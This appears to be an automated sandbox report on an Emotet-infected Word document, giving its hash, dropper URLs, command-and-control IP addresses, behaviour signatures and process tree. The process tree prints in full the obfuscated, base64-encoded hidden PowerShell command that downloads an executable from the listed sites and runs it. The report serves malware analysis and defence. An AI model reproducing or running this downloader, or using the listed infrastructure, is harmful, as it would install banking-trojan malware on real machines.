Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    27-01-2020 20:34

General

  • Target

    52cbfade77b0f617a83dd52e08fdc06820da595cb7aa9505337fe735f5cd3718.doc

  • Sample

    200127-p13vn2bnb2

  • SHA256

    52cbfade77b0f617a83dd52e08fdc06820da595cb7aa9505337fe735f5cd3718

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://yochina.apps.zeroek.com/assets/GQK9Gly/

exe.dropper

http://www.bandarwinsbobet.com/wp-admin/7bw/

exe.dropper

http://test.pakspaservices.com/wp-content/Yi1j6O7/

exe.dropper

http://portal.meucompromisso.com/wp-admin/kQJ/

exe.dropper

https://wondersofgeorgia.com/wp-admin/jv7hvg/

Extracted

Family

emotet

C2

207.177.72.129:8080

23.243.215.4:8080

218.255.173.106:80

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

64.66.6.71:8080

66.34.201.20:7080

85.152.174.56:80

202.175.121.202:8090

87.106.139.101:8080

176.9.43.37:8080

98.156.206.153:80

159.65.25.128:8080

70.184.9.39:8080

209.146.22.34:443

95.213.236.64:8080

98.30.113.161:80

59.103.164.174:80

rsa_pubkey.plain

Signatures

  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52cbfade77b0f617a83dd52e08fdc06820da595cb7aa9505337fe735f5cd3718.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    PID:4856
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABDAHQAZABoAHcAdAB0AHIAPQAnAFkAcQBiAHQAeQBxAHIAcgB3AGoAcAB6ACcAOwAkAFcAcABsAHQAdAB2AHgAYwB5AGwAawAgAD0AIAAnADgANQA4ACcAOwAkAEsAYQB1AHIAdAB4AGgAZwBvAHMAPQAnAEUAbAB2AGEAdwBoAHcAbgBkAHIAYwAnADsAJABTAHUAcgBpAHIAeABxAHYAawB0AG0AaABvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABXAHAAbAB0AHQAdgB4AGMAeQBsAGsAKwAnAC4AZQB4AGUAJwA7ACQARwB0AG4AaABtAGQAeAByAHgAbQA9ACcAWgB2AHcAcQBqAG0AYgBoAGEAbgBnAGEAagAnADsAJABCAGgAawBrAGcAbQBjAGsAdgB1AGUAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAEIAYwBsAGkARQBuAHQAOwAkAEEAbABhAHAAbABsAGYAYgBxAD0AJwBoAHQAdABwADoALwAvAHkAbwBjAGgAaQBuAGEALgBhAHAAcABzAC4AegBlAHIAbwBlAGsALgBjAG8AbQAvAGEAcwBzAGUAdABzAC8ARwBRAEsAOQBHAGwAeQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAYQBuAGQAYQByAHcAaQBuAHMAYgBvAGIAZQB0AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA3AGIAdwAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcwB0AC4AcABhAGsAcwBwAGEAcwBlAHIAdgBpAGMAZQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AWQBpADEAagA2AE8ANwAvACoAaAB0AHQAcAA6AC8ALwBwAG8AcgB0AGEAbAAuAG0AZQB1AGMAbwBtAHAAcgBvAG0AaQBzAHMAbwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBRAEoALwAqAGgAdAB0AHAAcwA6AC8ALwB3AG8AbgBkAGUAcgBzAG8AZgBnAGUAbwByAGcAaQBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBqAHYANwBoAHYAZwAvACcALgAiAHMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQB5AGcAcwB5AHYAZwBuAGQAdAB6AGMAPQAnAFoAZwB5AGQAYgB3AG0AegB3AHQAZgBiACcAOwBmAG8AcgBlAGEAYwBoACgAJABPAGkAawBlAHkAbABkAGMAdgBsAHgAZAAgAGkAbgAgACQAQQBsAGEAcABsAGwAZgBiAHEAKQB7AHQAcgB5AHsAJABCAGgAawBrAGcAbQBjAGsAdgB1AGUALgAiAGQATwBgAFcAbgBgAGwAYABvAGEARABGAEkAbABlACIAKAAkAE8AaQBrAGUAeQBsAGQAYwB2AGwAeABkACwAIAAkAFMAdQByAGkAcgB4AHEAdgBrAHQAbQBoAG8AKQA7ACQAUwBuAG4AeABzAGwAeABzAHIAdAA9ACcAUwBpAHQAeABrAGsAbQBuACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAUwB1AHIAaQByAHgAcQB2AGsAdABtAGgAbwApAC4AIgBMAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADIAMAA4ADgAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAHIAdAAiACgAJABTAHUAcgBpAHIAeABxAHYAawB0AG0AaABvACkAOwAkAFgAaAB3AGYAYQBjAG0AbgB4AD0AJwBVAHAAZwBiAGoAZAB3AGcAcABmAGoAeQBlACcAOwBiAHIAZQBhAGsAOwAkAFoAagB1AHAAZQBqAG0AZwBwAD0AJwBHAHcAcQBmAGcAdwBiAHcAbgBlAHEAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAcgBjAG4AagBzAGIAdQBkAGQAcwA9ACcATABpAGkAcQBsAG4AdwB6AHEAagB5AG0AdwAnAA==
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:4440
    • C:\Users\Admin\858.exe
      "C:\Users\Admin\858.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4572
      • C:\Users\Admin\858.exe
        --57fea1d9
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Suspicious behavior: EmotetMutantsSpam
        PID:4656

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\858.exe

  • C:\Users\Admin\858.exe

  • C:\Users\Admin\858.exe

  • memory/4572-9-0x0000000002240000-0x0000000002255000-memory.dmp

    Filesize

    84KB

  • memory/4656-11-0x0000000001F80000-0x0000000001F95000-memory.dmp

    Filesize

    84KB

  • memory/4656-12-0x0000000000400000-0x000000000045A000-memory.dmp

    Filesize

    360KB